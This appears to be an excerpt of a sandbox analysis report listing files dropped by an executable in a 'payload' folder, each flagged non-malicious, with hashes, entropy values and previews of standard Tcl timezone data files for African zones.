                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                                            MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                                            SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                                            SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                                            SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                                            MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                                            SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
                                                                                                                                                                                                                                            SHA-256:F6D1BA22115A6565B6D6ABEB578F001DDB41E673C422C8EA70D0DF77B24115F6
                                                                                                                                                                                                                                            SHA-512:23DB3E298FDEB165FD85D99E03C00835B584984B814AF7F54A9CDD4A9F93E16B0C58342D319129F46CF8EC36F93DE5EA51B492CA4CABDAB75D84709BC6C26119
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.882974805254803
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcx2m/2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dw/2D4yn
                                                                                                                                                                                                                                            MD5:92FF9E5835C0C80F358BFE69120660A0
                                                                                                                                                                                                                                            SHA1:724758B43BD79DD8A29B02BE6910D492924F8280
                                                                                                                                                                                                                                            SHA-256:5047A507D22B68C9349EB6A48C41C80DB4C69F98F99C6574059DEA87178E36C0
                                                                                                                                                                                                                                            SHA-512:6FCB709DB4AC19191FECE1E8BAC55E77F265B5AF89F7A3565F06BFAF0BEE12E3EAF2F52CA09C68D75C358C25A31867505CE8AD75D7386DCD15F4BE1CE61272CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Bangui) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.888193386512119
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcx79FHp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dw7J4c
                                                                                                                                                                                                                                            MD5:46E5703CF284E44E15E5872DF075FCBC
                                                                                                                                                                                                                                            SHA1:EA4BFA6D568DFA877F72302ADA21ECC2840D9FD5
                                                                                                                                                                                                                                            SHA-256:77E610A02CCECE3045B09D07A9BE6100F5AA9C3C2AEB543535C9AE941194F4E4
                                                                                                                                                                                                                                            SHA-512:1454467FE63E97DFA4DE66E359F68B2D80C92CDE59FC15A4BE513629FFD154D2281EADF3FC78F7AFDDF5A5896195F3A69E66697A659BBB1A0EAFD3E1DA6565EC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.847843768169462
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2Dc5iDMXGm2OHGVkeoHsdSawwF6hSVPVFwy:SlSWB9eg/2D4uDm2OHCkeoH1awwFMmMy
                                                                                                                                                                                                                                            MD5:7E710C939B9CC0C1AC1ECF4239B543C5
                                                                                                                                                                                                                                            SHA1:429CC87086FB22727815ED05AC6472333FF06013
                                                                                                                                                                                                                                            SHA-256:2A870E534DE67713C27F2F3B9BF26FA7498C240CF633988CE76DBDAC5B69214D
                                                                                                                                                                                                                                            SHA-512:70D9365C31C43A95211FC20E9290B24D356FFEFA935B8829CE32831026A196DECDD12226097F6DA3B4B919E137AA0181714680CDBB72B00C130A87E3A4735004
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Bissau) {.. {-9223372036854775808 -3740 0 LMT}.. {-1830380400 -3600 0 -01}.. {157770000 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.904342145830274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc8ycXp75h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAmp1hs
                                                                                                                                                                                                                                            MD5:7AD3749D7047855CB9B9EC9696015402
                                                                                                                                                                                                                                            SHA1:F792359AD9EEC2ABD98DAFA6661C1E57BAB89EBE
                                                                                                                                                                                                                                            SHA-256:8F700409B8EEE33ACE5F050414971FFEE0270949842E58E9299BB5CD6CCF34DE
                                                                                                                                                                                                                                            SHA-512:681C1B318746C587DEBA6E109D1D5A99D1F3E28FE46C24F36B69D533D884FDDC6EA35BB31A475575D683B73BF129FED761523EC9285F2FF1E4CACA2C54C046C5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.901235831565769
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DciE0TMJZp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D4qGp4D1
                                                                                                                                                                                                                                            MD5:7028268EE88250AC40547A3FDBBFC67C
                                                                                                                                                                                                                                            SHA1:5006D499CD1D1CB93EB3DA0EC279F76B7123DAA6
                                                                                                                                                                                                                                            SHA-256:596DB2D64CDD6250642CB65514D5BCB52F3E3EA83F50D8915D9D4FDEA008F440
                                                                                                                                                                                                                                            SHA-512:D623C69FE8A6050E77FB819C2F5FAEE35D5034182B1D30A409C17208155501656133E774E402875537335F8201E4734A0B5D327712CBF623AC330F1014D9025B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.947752840781864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DclbDcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkbDEi
                                                                                                                                                                                                                                            MD5:0EBC2D8F0BD1A32C21070F9397EAC9E2
                                                                                                                                                                                                                                            SHA1:95AAA97427265635784E8AC624CA863DB9F1475D
                                                                                                                                                                                                                                            SHA-256:9A15867255B43A954CA60DA11660F157553AAB6A15C50ACD49D182276E0CF4CC
                                                                                                                                                                                                                                            SHA-512:4CD2E14F84C58E955742637A51D99DB9493972671A2B5D801EBD9D901D4903654E374C59BF010C70071D33FA17788358F78004201A787CCA2AD714D670393488
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Bujumbura) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3852
                                                                                                                                                                                                                                            Entropy (8bit):3.7766651198444507
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:58ybRwEa40MF4pt0/jaGYbaJF0a3T07ITB85oWXmSGmuyTVuV0apRQnL0KD3rZza:fLg1GbJFp3gHRQVy7DPUUQkiHMo
                                                                                                                                                                                                                                            MD5:9DCDB3DD41DA13D81EB8E1CAF56964DA
                                                                                                                                                                                                                                            SHA1:F95EE7B1EF464F2640EC4AE29F3C18B5BF2B2905
                                                                                                                                                                                                                                            SHA-256:8698B0A53D858AEA7C495EDF759EF0E6C63F7E07A256599393DEC7B7A7413734
                                                                                                                                                                                                                                            SHA-512:BA5898ABEE541BC72C9DEDD77BABB18024C7AEA0274FA3F809748FCBFF770BFAD902BF70680DDE989F7D3592E5398C100D0E0EA388D4200911ED7DE089535D6D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Cairo) {.. {-9223372036854775808 7509 0 LMT}.. {-2185409109 7200 0 EET}.. {-929844000 10800 1 EEST}.. {-923108400 7200 0 EET}.. {-906170400 10800 1 EEST}.. {-892868400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-857790000 7200 0 EET}.. {-844308000 10800 1 EEST}.. {-825822000 7200 0 EET}.. {-812685600 10800 1 EEST}.. {-794199600 7200 0 EET}.. {-779853600 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165801600 7200 0 EET}.. {-147402000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5532
                                                                                                                                                                                                                                            Entropy (8bit):3.535398586134154
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:zE+CJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:7MZSszBrlKcJC9k
                                                                                                                                                                                                                                            MD5:18183122D242E0B69A80BC02BC0328DF
                                                                                                                                                                                                                                            SHA1:C9976ABC0663EB29A2FEAAFDF6746C05A264B67C
                                                                                                                                                                                                                                            SHA-256:8776EEDFDFEE09C4C833593127CEFAC9C33E2487AB9BF4BF8C73E5E11B4E5613
                                                                                                                                                                                                                                            SHA-512:9611A6EF9C5B55FAB752C1EC7E464B8AF60AE32383CE9BA72F35168ABB68A45DB0654A9099CBDC123F5F6E2B6DB7C8FBF56A8DDB813824187AD1090971F12219
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Casablanca) {.. {-9223372036854775808 -1820 0 LMT}.. {-1773012580 0 0 +00}.. {-956361600 3600 1 +00}.. {-950490000 0 0 +00}.. {-942019200 3600 1 +00}.. {-761187600 0 0 +00}.. {-617241600 3600 1 +00}.. {-605149200 0 0 +00}.. {-81432000 3600 1 +00}.. {-71110800 0 0 +00}.. {141264000 3600 1 +00}.. {147222000 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {448243200 3600 0 +01}.. {504918000 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {13731
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7536
                                                                                                                                                                                                                                            Entropy (8bit):3.8315604186920704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:TzLdXKy9f4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:TdayR41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:30155093248C4F7E45EF7C0132D2B2AB
                                                                                                                                                                                                                                            SHA1:FAD100CC49F0CB0910BDE39B43295A47512E1BE6
                                                                                                                                                                                                                                            SHA-256:8827F7311EDE69A9679BDF2B7418DBF350A2FC8F973E8B1E1E4390D4D5C6D2E8
                                                                                                                                                                                                                                            SHA-512:469A24AF0C2A4A40CB2488C3E21BB9BBDE057F876EACA08A31FC6F22845063D917A0A4AE96680401E45792DE534EE3A305F137A93C4DF879B4602510D881270E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ceuta) {.. {-9223372036854775808 -1276 0 LMT}.. {-2177452800 0 0 WET}.. {-1630112400 3600 1 WEST}.. {-1616810400 0 0 WET}.. {-1451692800 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1293840000 0 0 WET}.. {-94694400 0 0 WET}.. {-81432000 3600 1 WEST}.. {-71110800 0 0 WET}.. {141264000 3600 1 WEST}.. {147222000 0 0 WET}.. {199756800 3600 1 WEST}.. {207702000 0 0 WET}.. {231292800 3600 1 WEST}.. {244249200 0 0 WET}.. {265507200 3600 1 WEST}.. {271033200 0 0 WET}.. {448243200 3600 0 CET}.. {504918000 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.88110192592456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcmMM1+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DCM1+c
                                                                                                                                                                                                                                            MD5:8CDD2EEB7E0EC816F3EC051350FEBF13
                                                                                                                                                                                                                                            SHA1:37F3A149B4A01DFA2EAB42A28C810BE66AAB7C52
                                                                                                                                                                                                                                            SHA-256:3176C99FC45337CBCE0CD516DE4B02B8BAA47D00E84F698122A2ADD57797984E
                                                                                                                                                                                                                                            SHA-512:5A90B6DB45EDAD7734D596FB81FD1959A433F57E71D2212E1DCBD6A12F3FD1FE747FA363C4C787A4D3023F542553C1E2C9CF4F61E28F1BB13042E4AFE3D0FF31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Conakry) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.856992353568779
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXXMFBx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DKXEBn
                                                                                                                                                                                                                                            MD5:946D3B52F915445DBB8EE8BF67F4EFAB
                                                                                                                                                                                                                                            SHA1:18345968B95E886CA72634D49F2B38F9B29BA629
                                                                                                                                                                                                                                            SHA-256:D50F9732757B284BAC75526F2CFA585DF7F6974160827AFB0FF66124C7CFD361
                                                                                                                                                                                                                                            SHA-512:00B531D1352CF35045EE25C777C7FEA17294E9861E68CE2DE0D9884C05EBDEA84D5F4F0E8B5605721295E25C259979446B7DB76525A633C7D2FA35B38962CF43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Dakar) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.8447607449193075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2Dc8bEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DJbVDR
                                                                                                                                                                                                                                            MD5:7A819572758BC60F4085DF28F1DD1C01
                                                                                                                                                                                                                                            SHA1:0A5BA34EBFBA5A8E8B896713BA527781FC90FF01
                                                                                                                                                                                                                                            SHA-256:AB69948637416219A3D458777990FA4568BEBC89388884BBF129C0E1370A560B
                                                                                                                                                                                                                                            SHA-512:C03E785D1E85292056BB0BDD8DF8326C5DFEB6070AB1C071E1032D14EA69C9DEBC57B2CC7852E35D31652187126CCF0009A6A5C32F9DBB75D56C705535DF05CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.829357904445218
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcRHKQ1BQDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DOrkDR
                                                                                                                                                                                                                                            MD5:7981499F9430DC1636C9F834273E0B91
                                                                                                                                                                                                                                            SHA1:1D63F8578420D56E4A5D9D0881FBEC015421E416
                                                                                                                                                                                                                                            SHA-256:E7F7560CCD65D53C446ADAE7128A74D37E17DD0B907A2F2FD85322FB8707B497
                                                                                                                                                                                                                                            SHA-512:3C3F7D78E9A0DE6E2950E1C305EA2DBC986754AE9FB10AC410685F30C39EC235F6F221393099C012E62EE5A7B4F1BED67C96B7B81E90BBA064BA9FE685FE4050
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.850101792457859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcnKe2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dml2D4yn
                                                                                                                                                                                                                                            MD5:44881E75AC32FA95FF6143066EF01B90
                                                                                                                                                                                                                                            SHA1:A221619B4CDE8BE6A181E1F3869EAB665F2E98B8
                                                                                                                                                                                                                                            SHA-256:FCF2DAD148F4D2951320EA99730C56D5EB43D505F37416BE4BAD265CE2902706
                                                                                                                                                                                                                                            SHA-512:4FA67A5F84758366189F0FC4A7FA6C820BA083E1C56EA95D25D21A367F25F76261B7EB5631DFFEB20E095CFD64E770338773F76BD50D4CF6AE29AD3EDFCEC408
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Douala) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5235
                                                                                                                                                                                                                                            Entropy (8bit):3.541189246992611
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:+eCJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:+eqZSszBrlKcJC9k
                                                                                                                                                                                                                                            MD5:956F5B51FA8BA2E954A0E59AAC8F3276
                                                                                                                                                                                                                                            SHA1:AE35A8502E57EA6EE173E3B42509E4CAC73DA091
                                                                                                                                                                                                                                            SHA-256:5FB102A95B3C004AAB8371840B1A04AC352F48FF9E9EAFDEAAF21960B0F3CAA6
                                                                                                                                                                                                                                            SHA-512:19E7F2574E2B62DF68CC24737F6B94864B3D64B2472BC7D78E6AB5142A1DC1AB3B3700AB802129CB16AED4A4FED29E2B8A5593EE327ADF496255FE2FEF6A7023
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/El_Aaiun) {.. {-9223372036854775808 -3168 0 LMT}.. {-1136070432 -3600 0 -01}.. {198291600 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {1373162400 0 0 +00}.. {1376100000 3600 1 +00}.. {1382839200 0 0 +00}.. {1396144800 3600 1 +00}.. {1403920800 0 0 +00}.. {1406944800 3600 1 +00}.. {1414288800 0 0 +00}.. {1427594400 3600 1 +00}.. {1434247200 0 0 +00}.. {1437271200 3600 1 +00}.. {1445738400 0 0 +00}.. {1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.866631090752554
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcu5sp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dk4DBS
                                                                                                                                                                                                                                            MD5:6C115220CF951FC2EE3C299F86935B6D
                                                                                                                                                                                                                                            SHA1:A1CAB8C710BF20553AF45343118C1726CFE922B7
                                                                                                                                                                                                                                            SHA-256:BC53A4D489F48F14C594C4B0E52079B34E043A5751BBC7DF254A560352243575
                                                                                                                                                                                                                                            SHA-512:E87A4FD145B645DF034182CAD7F9D2BE5B2D9F3A17B6A9B6C84A0B3E846D92EC4C69DF2E85129B7A1AFBC0CCAAC8E3B1D47EB09F0900A82B908E9F6BF63B9736
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.899477454245453
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcHK0o/4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAV+4Dt
                                                                                                                                                                                                                                            MD5:07222D8ED83CDC456B4D5D84C4BDE320
                                                                                                                                                                                                                                            SHA1:2C657F461FA3F48D56C791AFE4AB7D2EAF45AF60
